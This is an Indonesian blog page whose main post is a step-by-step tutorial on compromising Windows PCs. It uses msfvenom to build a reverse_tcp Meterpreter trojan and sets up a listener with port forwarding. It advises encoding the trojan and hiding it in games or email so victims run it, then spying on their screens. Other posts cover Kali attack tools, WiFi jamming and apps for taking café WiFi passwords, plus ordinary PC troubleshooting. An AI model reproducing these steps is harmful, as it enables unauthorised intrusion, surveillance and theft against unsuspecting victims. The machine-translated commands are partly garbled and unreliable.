Cara Hack windows 10 menggunakan Kali linux Dengan Metasploit

Microsoft mengklaim bahwa windows 10 telah memperbaiki semua kerentanan keamanan. Kita bisa hack windows PC dengan remote exploit seperti "ms08_067_netapi" lagi. Windows telah memperbaiki kerentanan itu. sangat sedih. Tunggu sebentar, Lalu bagaimana kita bisa hack windows pc itu bahkan mungkin sekarang? Jawabannya adalah ya, mesin windows masih rentan terhadap serangan Trojan terlepas dari versinya. Dengan metode ini Anda bisa membobol semua mesin windows 10,8.1,8,7, vista dan xp.

Sebuah trojan atau backdoor dapat memberikan akses ke mesin target dari jarak jauh. Kita semua tahu itu, saya tidak akan terlalu dalam untuk menjelaskan apa itu trojan. Disini kita akan menggunakan trojan reverse_tcp. Ini adalah malware khusus yang membuat koneksi jarak jauh ke mesin hacker melalui Protokol Kontrol Transisi dari mesin korban. Hal ini memungkinkan hacker untuk masuk ke mesin dan mengendalikannya sepenuhnya.

Metasploit framework adalah salah satu tool terbaik yang saya sukai di kali linux. Ini memiliki generator handler dan payload. Setelah payload dijalankan pada mesin target saat kita sedang mendengarkan mode di bagian handler, ia menumbuhkan sebuah shell meterpreter. Shell meterpreter ini memungkinkan kita untuk berkomunikasi dengan sistem target dan mengeksekusi perintah shell. Dibandingkan dengan pengukur meter shell biasa ada banyak pilihan. Ini bisa dilakukan saat target berada di jaringan LAN yang sama atau melalui internet, tidak ada bedanya anda hanya perlu mengkonfigurasi router dan payload yang sesuai. Proses ini mati sederhana. Ikuti langkah-langkahnya.

Video Demo

 Konfigurasi Router

Langkah ini sangat penting bila target anda sudah lewat internet atau WAN. Abaikan langkah ini jika target Anda berada di LAN yang sama. Untuk hack pc melalui internet berarti Anda harus berkomunikasi di kedua arah. Untuk melakukan ini, router / modem Anda harus membuka port mesin Anda. Ini disebut port forwarding. Secara default semua port ditutup oleh router / modem anda. Buka browser ke url http://192.168.1.1 Ketik username dan password anda (secara default password dan username akan menjadi " admin"). Ini akan membawa Anda ke pengaturan router. Buka Pengaturan lanjutan menemukan port forwarding. Sekarang klik add new set start dan end port menjadi 444 (karena kita menggunakan port 444 pada metasploit). Di kolom alamat Ip Anda harus mengetikkan ip internal mesin linux Anda. Simpan Pengaturan. kamu selesai. Anda dapat memeriksa ulang dengan memindai port Anda dengan pemindai port online.

Menghasilkan Trojan

Buat payload menggunakan msfvenom. atur port ke 444 dan ip ke IP publik atau IP lokal Anda tergantung pada target Anda. Trojan yang dihasilkan akan mencoba terhubung ke IP dan port ini saat dieksekusi. Perintah berikut akan menghasilkan trojan dalam format .exe.

# msfvenom -p windows / meterpreter / reverse_tcp - platform windows-a x86 -f exe LHOST = "ip penyerang" LPORT = 444 -o /root/Desktop/trojan.exe

  

Sebuah trojan akan dihasilkan di desktop. sisihkan dan beralih ke bagian handler. jalankan metasploit dan ikuti langkahnya.

# msfconsole

Tunggu sebentar, msfconsole akan muncul. Gunakan handler lalu, set payload dan port.

1. Handler

msf> gunakan multi / handler

2. set payload

msf exploit (handler)> atur jendela PAYLOAD / meterpreter / reverse_tcp

3. Setel port lokal

msf exploit (handler)> atur LPORT 444

4. Tetapkan host lokal

msf exploit (handler)> set LHOST "attacker ip"

5. memanfaatkan

msf exploit (handler)> exploit

Tunggu target untuk menghubungkan kembali

msf exploit (handler)> exploit 
[*] Memulai handler terbalik di 192.168.1.104:444 
[*] Memulai handler payload ...

Jalankan muatannya

Sekarang Anda harus menjalankan trojan Anda pada sistem target. Mendistribusikan file exe mentah adalah ide yang buruk, lebih baik menyandikannya dan melampirkan aplikasi normal atau permainan atau bahkan email. Setelah keluar trojan masuk dan dieksekusi sesi meterpreter akan ditelurkan.

[*] Memulai penangan mundur di 192.168.1.104:444 
[*] Memulai penangan muatan ... 
[*] Mengirim panggung (83170 bytes) ke 192.168.1.105 
[*] Sesi Meterpreter 1 dibuka (192.168.1.104:444 -> 192.168. 1.105: 36028) pada 2016-05-20 03:20:45 -0500 
meterpreter>

Sesi Meterpreter memungkinkan Anda untuk menjalankan perintah sistem, perintah jaringan, memata-matai layar dan banyak lagi.

gunakan perintah help untuk melihat keseluruhan daftar perintah

meterpreter> bantuan

Gunakan perintah ini untuk menjalankan sesi vnc dan memata-matai target

meterpreter> run vnc

Seluruh proses ini sederhana namun, bagian terberat adalah mendapatkan trojan ke pengguna target. Melampirkan file beserta game karya hebat.

Read More

10 Tools Teratas Di Kali linux

Kali linux adalah pengujian penetrasi paling canggih yang pernah dibangun OS. Kali linux memiliki banyak alat yang tersedia untuk berbagai serangan. Ini adalah alat keamanan top 10 favorit saya. Ada banyak alat yang tersedia, ini adalah 10 alat yang saya temukan mengagumkan.

10. proxychains

proxychains adalah salah satu alat yang paling penting dalam kali linux. Proxychains mengarahkan semua lalu lintas aplikasi tertentu melalui server proxy yang diinginkan. Its dapat menutupi identitas pengguna dan mengamankan pengguna dari penyadap. Secara default, proxychains diatur untuk terhubung melalui server proxy dengan protokol yang lebih aman yang disebut SOCKS5. Aplikasi terbaik dari proxychains dijalankan sebagai layanan pada port 9050 dan menjalankan semua aplikasi dengan proxychains. Mudah, stabil dan aman. klik di sini untuk mengetahui lebih banyak tentang anonimitas online.

9. Armitage

Armitage pada dasarnya adalah versi grafis dari kerangka metasploit. Sebagian besar hacker newbie merasa sulit untuk menggunakan metasploit karena merupakan antarmuka baris perintah. Armitage menawarkan GUI yang keren untuk orang-orang ini. Kita bisa menemukan modul exploit atau auxiliary dengan user interface yang lebih mudah, agak seperti file explorer. semua perangkat yang di-hack serta perangkat yang dipindai terlihat seperti antarmuka ikon besar dan sangat mudah untuk diluncurkan menyerang beberapa sistem dalam sekali klik. Untuk jendela konsol penggunaan yang lebih canggih juga tersedia di bagian bawah. Armitage sangat membantu saat Anda ingin membuat atau mengendalikan tentara botnet. Bila Anda ingin mencatat keseluruhan jaringan sistem, armitage akan menjadi pilihan tepat.

8. BeEF

BeEF singkatan dari kerangka eksploitasi Browser. Daging sapi digunakan untuk mengeksploitasi kerentanan xss dan fokus pada serangan sisi klien. Begitu korban mengakses situs rentan xss yang terkait dengan daging sapi, server daging sapi yang berjalan di penyerang mengaitkan browser target. Saat browser ketagihan si penyerang mendapat kontrol penuh atas browser. Penyerang dapat menginstal atau menghapus plugin, menampilkan pop up, mengarahkan ulang ke url rouge. Dengan kerangka ini Anda bisa membuat korban mendownload malware atau Trojan Anda. Daging sapi memiliki antarmuka pengguna yang cukup bagus yang mudah digunakan juga.

7. Aircrack-ng

Aircrack bukan hanya alat toolkit yang digunakan untuk serangan nirkabel atau hanya hacking jaringan wifi. Kumpulan alat ini memungkinkan Anda untuk memantau jaringan, memecahkan hash WPA, menangkap jabat tangan dan bahkan mengirim paket deauth. Ini adalah toolkit utama untuk pengujian penetrasi nirkabel. Aircrack di kali linux hadir dengan antarmuka command line yang terlihat keren. Aircrack mendukung hampir semua adapter wifi dan juga tersedia untuk windows. Bagian yang paling menarik adalah ini bisa digunakan sebagai jammer wifi dengan mengirimkan paket deauth tak terbatas ke router dan dengan demikian memutus semua perangkat yang terhubung.

6. HashCat

Hashcat adalah perangkat lunak yang mengagumkan yang bisa memecahkan hampir semua jenis hash. Hashcat memiliki dua varian dengan dua algoritma yang berbeda yaitu CPU cracking yang lain adalah retak GPU. OclHashCat menggunakan algoritma cracking GPU yang sangat cepat dibandingkan cracking CPU biasa. Tidak seperti CPU, GPU memiliki terlalu banyak core. OclHashcat menggunakan multi-core ini untuk memecahkan ribuan hash dalam waktu kurang dari satu detik. Dengan 8x Nvidia Titan x yang berjalan pada ubuntu 64-bit bisa memecahkan upto 115840 mega hash per detik. Alat cracking hash yang hebat ini bisa sangat membantu saat Anda menggunakannya dengan daftar kata biasa atau serangan bruteforce.

5. Nmap

Nmap alias network mapper adalah alat yang cukup sederhana di kali linux yang memungkinkan Anda untuk memindai sistem atau jaringan. Nmap memungkinkan Anda untuk memindai port terbuka, menjalankan layanan, netbios, deteksi os dll. Nmap menggunakan berbagai jenis teknik deteksi untuk menghindari firewall filter IP. Nmap memiliki antarmuka command line dan GUI dan mendukung hampir semua platform termasuk windows dan mac. Ini alat yang harus anda gunakan sebelum menyerang sistem atau server.

4. vega

Vega adalah alat rekon canggih yang dilengkapi dengan antarmuka grafis yang dirancang dengan baik. Vega memindai server web dan membantu Anda mendeteksi hampir semua jenis kerentanan termasuk injeksi sql dan xss. Vega memilah link yang rentan terhadap tiga bagian yang berbeda berdasarkan tingkat keparahannya. Vega dapat mendeteksi nomor jaminan sosial dan email id. Ini juga memungkinkan Anda untuk melihat-lihat keseluruhan situs web dengan file manager seperti antarmuka.

3. Reaver

Reaver adalah alat terbaik dan sederhana untuk pengujian penetrasi nirkabel. Reaver menargetkan router berkemampuan WPS (Wireless protected setup). Reaver bruteforce semua 6 digit pin yang mungkin sehingga mengambil frasa sandi dari itu. Alat sederhana ini bisa memecahkan wifi dalam waktu sangat singkat tergantung pin wps. Jika router target memiliki pin default, maka reaver bisa memecahkannya dalam waktu 3 - 6 detik. Baca blog saya tentang cara hack router yang dilindungi wps dengan reaver untuk info lebih lanjut.

2. Sqlmap

Saya n penetrasi pengujian sebagian besar hacker mencoba untuk mencatat database di tempat pertama saat menyerang server web. sqlmap benar-benar kuat alat audit otomatis sepenuhnya untuk menyerang database dengan memanfaatkan sisi server sql kerentanan. Sqlmap hadir dengan antarmuka baris perintah dengan font hijau keren. Sqlmap dapat menargetkan Mysql, Mssql, postgresql, oracle dll dan mendukung hampir semua teknik injeksi. Anda hanya perlu memasukkan sisa link yang rentan sepenuhnya proses otomatis. Sqlmap mendukung mode multithreading dan juga proxy. klik disini untuk membaca blog di sql injection

1. Metasploit Framework

Metasploit framework alias msf adalah yang terbaik dan tidak ada: 1 tool di kali linux untuk serangan backdooring dan malware. msf memiliki eksploitasi 1500+, modul tambahan 800+ dan muatan 400+ yang lebih dari cukup. Msf dapat menargetkan jenis sistem termasuk jendela, mac, linux, android dan bahkan kamera cctv. Msf bisa menghasilkan backdoor dan mengendalikan sistem yang terinfeksi dengan pawangnya. Ini juga bisa meluncurkan eksploitasi jarak jauh, serangan bruteforce dan masih banyak lagi. CLI yang disederhanakan memungkinkan Anda menavigasi melalui semua eksploitasi dengan mudah dan mengelola sistem yang terinfeksi dengan mudah. klik disini untuk membaca blog di hacking windows 10 dengan metasploit. video tutorial tersedia disini

Read More

Cara-cara Mengatasi komputer Hang

Mungkin Anda pernah mengalami ketika sedang bekerja dengan komputer, membuka dokumen atau menjalankan aplikasi lainnya seperti game, tiba-tiba komputer menjadi hang, aplikasi menjadi stuck tidak bisa diapa-apain.  

Apabila masih memungkinkan, kita bisa menekan tombol CTRL+ALT+DEL untuk membuka jendela Task Manager dan memilih aplikasi yang Not Responding dan menutupnya secara paksa dengan menekan tombol End Task. Namun apabila komputer mengalami hang atau macet total, satu-satunya cara yang bisa kita lakukan adalah dengan mereset komputer secara paksa (hard reset-dengan menekan tombol restart atau tombol power) dan menyalakannya kembali.

Cara mengatasi komputer hang dengan merestart komputer tersebut biasanya cukup ampuh untuk mengatasi komputer hang yang disebabkan oleh aplikasi yang stuck, akan tetapi apabila setelah beberapa saat komputer dijalankan menjadi hang kembali, maka kemungkinan besar beberapa penyebabnya adalah seperti dibawah ini :

1. Komputer Hang karena CPU kepanasan (overheating)

Sebagian komputer menjadi hang, karena sistem pendingin pada CPU tidak berjalan dengan baik. Untuk menanggulangi hal ini ada beberapa cara yang bisa kita lakukan :

1. Buka heatsing dan kipas processor secara hati - hati.
2. Bersihkan sirip-sirip pendingin dan fan processor dari debu, kalau fan macet beri minyak pelumas sedikit pada bagian poros kalau perlu ganti fan dengan yang baru.
3. Bersihkan thermal paste yang sudah kering yang menempel pada processor dan heatsink, ganti dan oleskan thermal paste yang baru.
4. Masukan lagi processor, heatsink serta fan kedalam dudukannya secara hati-hati.
5. Perhatikan posisi heatsink (logam pendingin) dan kipas Processor, pastikan kondisi Heatsing sudah terpasang secara benar terutama untuk tipe Heatsing untuk Processor socket LGA, perhatikan kondisi tiap-tiap sekrup yang terpasang.

CPU kotor penuh debu penyebab komputer hang

2. Komputer hang karena Power Supply kekurangan daya

Ada kalanya juga komputer hang karena Power Supply yang sudah rusak, meskipun tidak menyebabkan mati total, kekurangan daya pada power supply bisa menyebabkan kinerja komputer melambat bahkan komputer menjadi hang dan beberapa peralatan USB tidak terdeteksi atau tidak berfungsi.

3. Komputer hang karena masalah pada hardisk

Ada beberapa masalah pada hardisk yang menyebabkan komputer hang, diantaranya adalah :

• Kapasitas Hardisk Low Space.
  Untuk mengatasinya kita jalankan dulu Disk CleanUp untuk membersihkan hardisk dari file-file temporary atau file sampah. Cara menjalankan Disk Cleanup :  klik start – run – ketik : cleanmgr
• Data pada Hardisk terpragmentasisehingga perlu di defrag.
• Hardisk Bad Sector.
  Saya pernah mengalami kejadian dimana setelah Windows booting semua tampak berjalan normal, tetapi ketika membuka sebuah dokumen dan mulai bekerja, tiba-tiba mouse dan keyboard diam, komputer menjadi hang!!!. Sayapun kemudian mencopot hardisk tersebut dan memasangkannya pada komputer lain kemudian menjalankan program checkdisk untuk memeriksa dan memperbaiki keruksakan pada  hardisk tersebut. Setelah hardisk selesai diperbaiki kemudian dipasangkan kembali pada komputer sebelumnya dan Alhamdulillah kondisi komputerpun normal kembali.

4. Komputer hang karena VGA Card rusak

Beberapa komputer juga mengalami hang karena terdapat keruksakan pada katu VGA-nya. Hal ini juga pernah saya alami ketika seorang teman mengeluhkan kondisi komputernya yang tiba-tiba aja menjadi sering hang. Setelah saya cek ternyata heatsink pada kartu VGA terasa panasnya tidak normal, untuk itu sayapun kemudian mengganti kartu VGA tersebut dan ternyata setelah kartu VGA saya ganti kondisi komputer menjadi normal kembali.

5. Komputer hang karena masalah Memori.

Memori (RAM) yang rusak atau kapasitas memori yang kurang sering juga menjadi faktor komputer menjadi hang. Periksalah kembali memori aktual yang terpasang dengan kapasitas memori yang terbaca oleh komputer, sebab ada kalanya kita memasang beberapa keping memori tetapi yang terbaca hanya satu keping saja. Beberapa memori yang digunakan tetapi tidak identik (sama tipe dan kapasitasnya) bukannya malah mempercepat komputer tetapi malah memperlambat dan membuat hang komputer Anda. 

6. Komputer hang karena koneksi LAN

Untuk komputer yang terhubung ke jaringan, kadang kala terasa berat ketika mengakses data dari komputer lain, program berjalan lambat dan akhirnya komputer seakan-akan menjadi hang. Untuk memastikan komputer hang karena koneksi jaringan (LAN), lepaskan dulu kabel jaringan pada komputer kemudian jalankan komputer seperti biasa. Apabila semua berjalan secara normal dapat dipastikan komputer hang karena koneksi jaringan.

Beberapa cara yang bisa dilakukan adalah: 

• pastikan konektor RJ45 terpasang dengan benar, bila perlu lakukan crimping ulang.
• gunakan perintah ping untuk memeriksa koneksi jaringan
  contoh perintah: ping -l 200 192.168.0.1
• lakukan reset pada hub (switch) LAN, caranya bisa dengan mencabut kabel power Hub/Switch tersebut, tunggu beberapa saat kemudian masukan kembali.
• cara lain yang bisa dilakukan adalah dengan memindahkan kabel jaringan dari port yang satu ke port yang lain (biasanya ada beberapa port dalam hub yang menjadi rusak karena masalah-masalah tertentu).
• troubleshooting yang juga bisa kita lakukan adalah dengan mengganti kartu jaringan (LAN Card) dengan yang baru.

7. Komputer hang karena adanya Virus komputer

Aktifitas dari virus yang memakan banyak resource komputer sering menyebabkan komputer melambat bahkan menjadi hang. Cara ampuh untuk membersihkan komputer dari virus adalah dengan booting komputer dan pilih safe mode, lalu scan komputer dengan antivirus scanner seperti malwarebytes, norman malware scanner, trend micro system cleaner atau dengan menggunakan Antivirus Live CD Untuk panduan pembersihan virus secara total bisadibaca pada ebook "Complete Malware Recovery Guide. 

8. Komputer hang karena driver yang tidak cocok

Driver hardware yang tidak cocok dengan hardware yang terpasang atau driver yang tidak cocok dengan sistem operasi yang digunakan bisa menyebabkan komputer hang atau bahkan komputer bluescreen. Untuk mengetahui driver yang harus diinstall kita bisa menggunakan Driver Easy atau menggunakan DVD DriverPack Solution. 

9. Mencari penyebab komputer hang dengan WhatIsHang

Selain karena pernasalahan hardware seperti diatas, komputer hang sering terjadi karena masalah software. Untuk menentukan apa yang menyebabkan masalah atau bagaimana untuk memecahkan masalah komputer hang tersebut kita bisa menggunakan aplikasi WhatIsHang -http://goo.gl/FHucLy 

Aplikasi ini mencoba untuk mendeteksi perangkat lunak atau proses yang sedang digantung, dan menampilkan beberapa informasi yang dapat memungkinkan Anda untuk memilah dan memahami apa sebenarnya yang menjadi akar dari perilaku tak terduga tersebut.

Sebagian besar informasi yang ditampilkan dalam laporan WhatIsHang itu, seperti Call Stack, Data Stack, Register Processor, dan Data memori dirancang untuk pengguna dengan pengetahuan pemrograman Windows. Namun, WhatIsHang juga menyajikan daftar string dan file .dll terkait dengan masalah menggantung yang dapat membantu pengguna awam untuk memahami dan mengatasi penyebab komputer hang.

Barangkali itulah beberpa penyebab dan cara memperbaiki komputer hang, yang pernah saya alami, semoga bisa membantu...

Read More

Aplikasi Android untuk Hack wifi Wpa/Wpa2

Untuk bisa berselancar didunia maya, maka diharuskan smartphone atau perangkat Anda tersambung dengan jaringan internet yang stabil serta cepat, seperti yang sudah kita ketahui bahwa saat ini hampir semua orang memiliki smartphone android dan tidak bisa lepas dari yang namanya internet. Jika menggunakan Kuota, maka berselancar didunia maya masih terbatas dan tida bisa leluasa dalam berjelajah.

Salah satu cara yang paling efektif untuk berselancar didunia yaitu perangkat smartphone harus tersambung dengan jaringan Wifi. Pasalnya jaringan Wifi tersebut jauh lebih stabil dibanding mobile data. Untuk bisa mendapatkan akses Wifi gratis ini kita bisa mendatangi tempat-tempat umum seperti Cafe, Hotel, Restoran, Taman dan lain sebagainya.

Yang perlu untuk Anda ketahui ialah tidak semua tempat umum koneksi Wifinya bisa dinikmati, karena sama pemilik tempat tersebut sudah diberi kata sandi, apabila kita ingin mengetahui kata sandi tersebut maka kita harus membeli sesuatu. Dengan begitu hanya pelanggan-nya saja yang bisa menikmati fasilitas Wifi Gratis tersebut. Tapi ada juga pelanggan yang malu untuk menanyakan password Wifi sehingga ia tidak bisa menikmati fasilitas tersebut.

Nah, solusi yang tepat untuk mengatasi masalah tersebut ialah Aplikasi Penting Untuk Melihat Password Wifi WPA WPA2. Sebenarnya, cara seperti ini tidak boleh digunakan karena merupakan tindakan pencurian kata sandi. Akan tetapi sebagai pelanggan, sangat disayangkan apabila tidak bisa menikmati fasilitas yang sudah disediakan.

Aplikasi Penting Untuk Melihat Password Wifi WPA WPA2 yang kami share ini harus Anda gunakan dengan bijak, jangan dipakai untuk berbuat jahat seperti melihat kata sandi wifi kemudian disebar-sebarkan. Cukup hanya Anda saja yang mengetahui password Wifi tersebut. Penasaran dengan Aplikasi Penting Untuk Melihat Password Wifi WPA WPA2 tersebut? Lansgung saja simak ulasan dibawah ini.

Aplikasi Penting Untuk Melihat Password Wifi WPA WPA2

Wifi Hacker Profesional

Wifi Hacker Profesional adalah sebuah aplikasi untuk melihat password Wifi yang paling tepat, disamping mudah dimengerti oleh penggunanya, Anda pun bisa mengetahui password Wifi dengan cepat. Maka dari itu aplikasi Wifi Hacker Profesional ini sangat kami rekomendasikan kepada Anda. Link Download ada DISINI

WiFi Password Key

Jika Anda tidak suka dengan aplikasi Untuk Melihat Password Wifi diatas, Anda masih bisa mencoba aplikasi lain yang kami rekomendasikan bernama WiFi Password Key. Untuk bisa mendapatkan password Wifi yang akan Anda retas, Anda cukup memasukan SSID Name pada kolom yang sudah disediakan. Link Download ada DISINI.

Read More